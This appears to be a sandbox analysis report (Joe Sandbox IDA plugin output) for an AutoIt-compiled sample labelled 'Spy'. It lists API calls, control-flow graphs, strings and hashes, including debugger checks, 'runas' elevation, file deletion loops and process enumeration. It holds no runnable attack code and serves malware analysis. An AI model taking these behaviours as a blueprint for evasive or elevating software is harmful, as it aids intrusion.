101545->101548 101546 a95e41 101547 a955f0 2 API calls 101546->101547 101549 a95e49 GetNativeSystemInfo 101547->101549 101548->101541 101550 a95e5c FreeLibrary 101548->101550 101549->101548 101550->101541 101553 a95619 101552->101553 101554 a955f9 LoadLibraryA 101552->101554 101553->101545 101553->101546 101554->101553 101555 a9560a GetProcAddress 101554->101555 101555->101553

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A9526C
                                                      • IsDebuggerPresent.KERNEL32 ref: 00A9527E
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00A952E6
                                                        • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                        • Part of subcall function 00A8BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A8BC07
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A95366
                                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00AD0B2E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AD0B66
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B36D10), ref: 00AD0BE9
                                                      • ShellExecuteW.SHELL32(00000000), ref: 00AD0BF0
                                                        • Part of subcall function 00A9514C: GetSysColorBrush.USER32(0000000F), ref: 00A95156
                                                        • Part of subcall function 00A9514C: LoadCursorW.USER32(00000000,00007F00), ref: 00A95165
                                                        • Part of subcall function 00A9514C: LoadIconW.USER32(00000063), ref: 00A9517C
                                                        • Part of subcall function 00A9514C: LoadIconW.USER32(000000A4), ref: 00A9518E
                                                        • Part of subcall function 00A9514C: LoadIconW.USER32(000000A2), ref: 00A951A0
                                                        • Part of subcall function 00A9514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A951C6
                                                        • Part of subcall function 00A9514C: RegisterClassExW.USER32(?), ref: 00A9521C
                                                        • Part of subcall function 00A950DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A95109
                                                        • Part of subcall function 00A950DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A9512A
                                                        • Part of subcall function 00A950DB: ShowWindow.USER32(00000000), ref: 00A9513E
                                                        • Part of subcall function 00A950DB: ShowWindow.USER32(00000000), ref: 00A95147
                                                        • Part of subcall function 00A959D3: _memset.LIBCMT ref: 00A959F9
                                                        • Part of subcall function 00A959D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A95A9E
                                                      Strings
                                                      • runas, xrefs: 00AD0BE4
                                                      • AutoIt, xrefs: 00AD0B23
                                                      • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00AD0B28
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                      • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                      • API String ID: 529118366-2030392706
                                                      • Opcode ID: 03ed5dda570f68d1267930eac6bbe5ad4e90f28a2d6b908da8b7f9e9c5c848cc
                                                      • Instruction ID: e8e6f5b6e9fb942f630f8181ddf3142afaa8d697d5abbd515deda216aa4494b1
                                                      • Opcode Fuzzy Hash: 03ed5dda570f68d1267930eac6bbe5ad4e90f28a2d6b908da8b7f9e9c5c848cc
                                                      • Instruction Fuzzy Hash: 3151D331F48249AACF12BBB0DD56EEE7BF8AB06340F1041A5F451672A2DFF04A45DB61

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4
                                                        • Part of subcall function 00AE4FEC: GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00AE3D96
                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00AE3E3E
                                                      • MoveFileW.KERNEL32(?,?), ref: 00AE3E51
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00AE3E6E
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00AE3E90
                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00AE3EAC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 4002782344-1173974218
                                                      • Opcode ID: 2820d31bf6d182582c4186fe0210119c506c70d5d6e488688fecd6fb842ddf7a
                                                      • Instruction ID: a28d5492202e2e9f3c7797d07a58f4a66356aba9d15a2f9e6ca369363041c33b
                                                      • Opcode Fuzzy Hash: 2820d31bf6d182582c4186fe0210119c506c70d5d6e488688fecd6fb842ddf7a
                                                      • Instruction Fuzzy Hash: 0E516F3290118EAACF15FBA1CA969EDB7B9AF15300F604165E442B7192EF316F09CB60

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1009 a95d13-a95d73 call a91207 GetVersionExW call a91821 1014 a95d79 1009->1014 1015 a95e78-a95e7a 1009->1015 1017 a95d7c-a95d81 1014->1017 1016 ad0fa9-ad0fb5 1015->1016 1020 ad0fb6-ad0fba 1016->1020 1018 a95e7f-a95e80 1017->1018 1019 a95d87 1017->1019 1021 a95d88-a95dbf call a91981 call a9133d 1018->1021 1019->1021 1022 ad0fbd-ad0fc9 1020->1022 1023 ad0fbc 1020->1023 1032 ad1098-ad109b 1021->1032 1033 a95dc5-a95dc6 1021->1033 1022->1020 1024 ad0fcb-ad0fd0 1022->1024 1023->1022 1024->1017 1026 ad0fd6-ad0fdd 1024->1026 1026->1016 1028 ad0fdf 1026->1028 1031 ad0fe4-ad0fea 1028->1031 1034 a95e00-a95e17 GetCurrentProcess IsWow64Process 1031->1034 1035 ad109d 1032->1035 1036 ad10b4-ad10b8 1032->1036 1037 ad0fef-ad0ffa 1033->1037 1038 a95dcc-a95dcf 1033->1038 1043 a95e19 1034->1043 1044 a95e1c-a95e2d 1034->1044 1041 ad10a0 1035->1041 1045 ad10ba-ad10c3 1036->1045 1046 ad10a3-ad10ac 1036->1046 1039 ad0ffc-ad1002 1037->1039 1040 ad1017-ad1019 1037->1040 1038->1034 1042 a95dd1-a95def 1038->1042 1047 ad100c-ad1012 1039->1047 1048 ad1004-ad1007 1039->1048 1050 ad103c-ad103f 1040->1050 1051 ad101b-ad1027 1040->1051 1041->1046 1042->1034 1049 a95df1-a95df7 1042->1049 1043->1044 1053 a95e98-a95ea2 GetSystemInfo 1044->1053 1054 a95e2f-a95e3f call a955f0 1044->1054 1045->1041 1052 ad10c5-ad10c8 1045->1052 1046->1036 1047->1034 1048->1034 1049->1031 1055 a95dfd 1049->1055 1059 ad1065-ad1068 1050->1059 1060 ad1041-ad1050 1050->1060 1056 ad1029-ad102c 1051->1056 1057 ad1031-ad1037 1051->1057 1052->1046 1058 a95e65-a95e75 1053->1058 1066 a95e8c-a95e96 GetSystemInfo 1054->1066 1067 a95e41-a95e4e call a955f0 1054->1067 1055->1034 1056->1034 1057->1034 1059->1034 1065 ad106e-ad1083 1059->1065 1062 ad105a-ad1060 1060->1062 1063 ad1052-ad1055 1060->1063 1062->1034 1063->1034 1068 ad108d-ad1093 1065->1068 1069 ad1085-ad1088 1065->1069 1071 a95e56-a95e5a 1066->1071 1074 a95e50-a95e54 GetNativeSystemInfo 1067->1074 1075 a95e85-a95e8a 1067->1075 1068->1034 1069->1034 1071->1058 1073 a95e5c-a95e5f FreeLibrary 1071->1073 1073->1058 1074->1071 1075->1074
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00A95D40
                                                        • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                      • GetCurrentProcess.KERNEL32(?,00B10A18,00000000,00000000,?), ref: 00A95E07
                                                      • IsWow64Process.KERNEL32(00000000), ref: 00A95E0E
                                                      • GetNativeSystemInfo.KERNEL32(00000000), ref: 00A95E54
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00A95E5F
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00A95E90
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00A95E9C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                      • String ID:
                                                      • API String ID: 1986165174-0
                                                      • Opcode ID: 74f677873b4f88830c9341a24a55d1da4bfdf0c28275d86a76e4384fb324f96b
                                                      • Instruction ID: 3c24dc03dd3468ec0d0f384a6a8e13fea7210a64abde9ecfb2912f123df70c0d
                                                      • Opcode Fuzzy Hash: 74f677873b4f88830c9341a24a55d1da4bfdf0c28275d86a76e4384fb324f96b
                                                      • Instruction Fuzzy Hash: 0591F531A4DBC0DECB32DB7884515AAFFF56F2A300B884A5ED0C793B01D631AA48C759

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1076 ae4005-ae404c call a91207 * 3 call aa0284 call ae4fec 1087 ae404e-ae4057 call a91900 1076->1087 1088 ae405c-ae408d call aa0119 FindFirstFileW 1076->1088 1087->1088 1092 ae408f-ae4091 1088->1092 1093 ae40fc-ae4103 FindClose 1088->1093 1092->1093 1095 ae4093-ae4098 1092->1095 1094 ae4107-ae4129 call a91cb6 * 3 1093->1094 1097 ae409a-ae40d5 call a91c9c call a917e0 call a91900 DeleteFileW 1095->1097 1098 ae40d7-ae40e9 FindNextFileW 1095->1098 1097->1098 1111 ae40f3-ae40fa FindClose 1097->1111 1098->1092 1099 ae40eb-ae40f1 1098->1099 1099->1092 1111->1094
                                                      APIs
                                                        • Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4
                                                        • Part of subcall function 00AE4FEC: GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00AE407C
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00AE40CC
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00AE40DD
                                                      • FindClose.KERNEL32(00000000), ref: 00AE40F4
                                                      • FindClose.KERNEL32(00000000), ref: 00AE40FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 2649000838-1173974218
                                                      • Opcode ID: 90c511c713a70832f4a5b14ea93fdac5765d99c368986db313b4cc607832e060
                                                      • Instruction ID: 888f0342082a9c605c41eec3fd1db383906d8d2ddbb4bd2acbfcb1fd27db5c68
                                                      • Opcode Fuzzy Hash: 90c511c713a70832f4a5b14ea93fdac5765d99c368986db313b4cc607832e060
                                                      • Instruction Fuzzy Hash: 3F316B311183869BC601FF60C9958EFB7ECBE95304F444A2DF5E183191EB349A09CBA2
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00AE416D
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00AE417B
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00AE419B
                                                      • CloseHandle.KERNEL32(00000000), ref: 00AE4245
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 420147892-0
                                                      • Opcode ID: a6c4572d20236872cc9c0d313972dc3c6728003f85d3c35edf2e5b684d458bef
                                                      • Instruction ID: 809da9100080e913a2fea625fcfaa4f535d82724a54a2637d66787943de75e64
                                                      • Opcode Fuzzy Hash: a6c4572d20236872cc9c0d313972dc3c6728003f85d3c35edf2e5b684d458bef
                                                      • Instruction Fuzzy Hash: 5C3181712083429FD700EF55D885AEFBBF8AF99350F40092DF585C31A1EB719A49CB52
                                                      APIs
                                                        • Part of subcall function 00A93740: CharUpperBuffW.USER32(?,00B471DC,00000000,?,00000000,00B471DC,?,00A853A5,?,?,?,?), ref: 00A9375D
                                                      • _memmove.LIBCMT ref: 00A8B68A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper_memmove
                                                      • String ID:
                                                      • API String ID: 2819905725-0
                                                      • Opcode ID: 94a44c880c36d04af648ddf60eee2cd81e5e54828101e9a9e8fdc92d43a529a7
                                                      • Instruction ID: 9c3aa79ecc67209427fff7130a390d0fe83b3e4967153dba67dd5366c1451fd1
                                                      • Opcode Fuzzy Hash: 94a44c880c36d04af648ddf60eee2cd81e5e54828101e9a9e8fdc92d43a529a7
                                                      • Instruction Fuzzy Hash: C4A278716183419FCB24EF18C580B2AB7F1BF89304F15896DE89A8B361D771ED45CBA2
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,00ACFC86), ref: 00AE495A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00AE496B
                                                      • FindClose.KERNEL32(00000000), ref: 00AE497B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: 4f563899515d1870f5f126080455320547aaed77223aed4752adcb03144b08f9
                                                      • Instruction ID: a693949508d0b37af7e21b2ba180a89f261ffeabda5eb766d2e105a75b88cb90
                                                      • Opcode Fuzzy Hash: 4f563899515d1870f5f126080455320547aaed77223aed4752adcb03144b08f9
                                                      • Instruction Fuzzy Hash: 0EE0DF31820515AB82107B38EC0D8EA775C9E0A339F904705F835E20E0EBB49D9886D6
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e826f4daabdb17ad8ff0d7c2386d32a7c7eafbb70d68a8baa36b4f354344b67
                                                      • Instruction ID: 2ebb767ceeb2b24ec00bc17f2786968d34e47810da72785bc6a26556a21aa6db
                                                      • Opcode Fuzzy Hash: 9e826f4daabdb17ad8ff0d7c2386d32a7c7eafbb70d68a8baa36b4f354344b67
                                                      • Instruction Fuzzy Hash: 0A229C74A00206DFDB24EF58C580BBFB7B0FF49310F198169E856AB391E770A985CB91
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00A8BF57
                                                        • Part of subcall function 00A852B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A852E6
                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00AC36B5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessagePeekSleepTimetime
                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                      • API String ID: 1792118007-922114024
                                                      • Opcode ID: 5848012a495aa5e43222cbde7b0ea9724a712aaa7d0dff0a65424ac637e5e022
                                                      • Instruction ID: 8b4a5d4bf44b3d085ead19a4fe27f3b19e2b912cafaadd6bf574636732c8a6be
                                                      • Opcode Fuzzy Hash: 5848012a495aa5e43222cbde7b0ea9724a712aaa7d0dff0a65424ac637e5e022
                                                      • Instruction Fuzzy Hash: 9AC2AF716083419FDB24EF24C994FAEB7E0BF84304F15891DF58A9B2A1DB71E944CB92

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A83444
                                                      • RegisterClassExW.USER32(00000030), ref: 00A8346E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A8347F
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00A8349C
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A834AC
                                                      • LoadIconW.USER32(000000A9), ref: 00A834C2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A834D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: dcdd6345a9fc27619fe2e0548fe947f508f21a87138cfe44297933ca715a6fab
                                                      • Instruction ID: 8e4b1e057d8be9c1f91c6e1ef2bb08db1687b09a40301c4b7b53b1e93747e3da
                                                      • Opcode Fuzzy Hash: dcdd6345a9fc27619fe2e0548fe947f508f21a87138cfe44297933ca715a6fab
                                                      • Instruction Fuzzy Hash: 013116B5954309EFDB40DFA4D889BC9BBF4FB09310F50815AF590A72A0EBB50681CF90

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A83444
                                                      • RegisterClassExW.USER32(00000030), ref: 00A8346E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A8347F
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00A8349C
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A834AC
                                                      • LoadIconW.USER32(000000A9), ref: 00A834C2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A834D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: db2481cc45551abe8e041504cfdf34f0d4a677e984364cd63c4ab6baaa9535ed
                                                      • Instruction ID: f31650442481fcaafbbc9c50319c4ef66ceb4bc40a59f4f09c6d35b788c6ce3b
                                                      • Opcode Fuzzy Hash: db2481cc45551abe8e041504cfdf34f0d4a677e984364cd63c4ab6baaa9535ed
                                                      • Instruction Fuzzy Hash: 2F21E2B5964209AFDB00EFA5EC88BDDBBF4FB09700F40811AF510A72A0DBB11684CF91

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00AA00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00A93094), ref: 00AA00ED
                                                        • Part of subcall function 00AA08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A9309F), ref: 00AA08E3
                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A930E2
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AD01BA
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AD01FB
                                                      • RegCloseKey.ADVAPI32(?), ref: 00AD0239
                                                      • _wcscat.LIBCMT ref: 00AD0292
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 2673923337-2727554177
                                                      • Opcode ID: 967bb0adf91945599c7ef3a8f1c28f2d829f61ec4b4bf5b4a344c7c8af752fa1
                                                      • Instruction ID: b4d01445b2e9865e76340494e6cfc0ab1465e6cf64b3ae3b0a0945baa3ce7a47
                                                      • Opcode Fuzzy Hash: 967bb0adf91945599c7ef3a8f1c28f2d829f61ec4b4bf5b4a344c7c8af752fa1
                                                      • Instruction Fuzzy Hash: CC715A755057019EC714EF25E9859AFBBE8FF4A340F80052EF545872A1EFB09A88CB52

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A95156
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00A95165
                                                      • LoadIconW.USER32(00000063), ref: 00A9517C
                                                      • LoadIconW.USER32(000000A4), ref: 00A9518E
